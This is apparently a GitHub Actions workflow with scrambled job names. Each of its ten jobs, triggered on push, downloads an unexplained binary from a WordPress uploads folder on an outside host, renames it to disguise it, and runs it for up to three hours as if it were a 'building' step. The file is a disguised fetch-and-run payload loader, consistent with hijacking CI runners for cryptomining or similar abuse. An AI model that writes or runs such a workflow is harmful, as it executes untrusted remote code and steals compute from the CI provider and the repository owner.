name: isninne
on: push
jobs:
  nefrihuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/kicici; chmod +x kicici; mv kicici kainoe; ./kainoe --building --server
  nefrihfuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
  nefrgihuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/kicici; chmod +x kicici; mv kicici kainoe; ./kainoe --building --server
  nefrighfuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
  nefrighuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/kicici; chmod +x kicici; mv kicici kainoe; ./kainoe --building --server
  nefrihgfuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
  nefrihuwug1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/kicici; chmod +x kicici; mv kicici kainoe; ./kainoe --building --server
  nefrihghfuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
  nefrhihuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/kicici; chmod +x kicici; mv kicici kainoe; ./kainoe --building --server
  nefrihfuhwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 180
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
